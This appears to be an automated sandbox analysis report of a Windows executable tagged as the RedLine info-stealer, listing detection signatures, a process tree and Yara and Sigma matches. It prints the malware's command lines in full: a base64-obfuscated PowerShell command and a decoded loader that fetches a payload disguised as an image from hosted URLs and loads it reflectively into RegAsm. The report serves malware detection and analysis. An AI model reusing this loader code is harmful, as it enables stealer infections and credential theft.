Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OTO2wVGgkl.exe

Overview

General Information

Sample name:OTO2wVGgkl.exe
renamed because original name is a hash value
Original sample name:63af3844e6d0a5fa89da17713ce1fb59.exe
Analysis ID:1527751
MD5:63af3844e6d0a5fa89da17713ce1fb59
SHA1:8b457819c6b7ce8e04755ef75b8ce176bc58fb28
SHA256:7507af39b3ed38d361e06c2a232d5703369bb11706184d0d10318a5ff3d9cabc
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OTO2wVGgkl.exe (PID: 280 cmdline: "C:\Users\user\Desktop\OTO2wVGgkl.exe" MD5: 63AF3844E6D0A5FA89DA17713CE1FB59)
    • cmd.exe (PID: 2064 cmdline: cmd.exe /c 123.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 972 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 1776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#Ng#w#G8#c##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 4788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1776JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 1776INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x5ebf:$b2: ::FromBase64String(
    • 0x389f2:$b2: ::FromBase64String(
    • 0x5cd0:$b3: ::UTF8.GetString(
    • 0x38803:$b3: ::UTF8.GetString(
    • 0x1a3ce:$s1: -join
    • 0x1f417:$s1: -join
    • 0x703cd:$s3: reverse
    • 0x77022:$s3: reverse
    • 0x79009:$s3: reverse
    • 0x84038:$s3: reverse
    • 0xe5afd:$s3: reverse
    • 0xe5deb:$s3: reverse
    • 0xe6505:$s3: reverse
    • 0xe6cbe:$s3: reverse
    • 0xedda9:$s3: reverse
    • 0xee1c3:$s3: reverse
    • 0xeed4b:$s3: reverse
    • 0xef9f8:$s3: reverse
    • 0x11bbdb:$s3: reverse
    • 0x127419:$s3: reverse
    • 0x13c0c6:$s3: reverse
    Process Memory Space: powershell.exe PID: 5664JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 5664INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc616:$b2: ::FromBase64String(
      • 0x2b275:$b2: ::FromBase64String(
      • 0x39cb2:$b2: ::FromBase64String(
      • 0x2d718b:$b2: ::FromBase64String(
      • 0x32c26e:$b2: ::FromBase64String(
      • 0x42bd04:$b2: ::FromBase64String(
      • 0x42dbde:$b2: ::FromBase64String(
      • 0xc427:$b3: ::UTF8.GetString(
      • 0x2b086:$b3: ::UTF8.GetString(
      • 0x39ac3:$b3: ::UTF8.GetString(
      • 0x2d6f9c:$b3: ::UTF8.GetString(
      • 0x32c07f:$b3: ::UTF8.GetString(
      • 0x42bb15:$b3: ::UTF8.GetString(
      • 0x42d9ef:$b3: ::UTF8.GetString(
      • 0x133b0f:$s1: -join
      • 0x140be4:$s1: -join
      • 0x143fb6:$s1: -join
      • 0x144668:$s1: -join
      • 0x146159:$s1: -join
      • 0x14835f:$s1: -join
      • 0x148b86:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
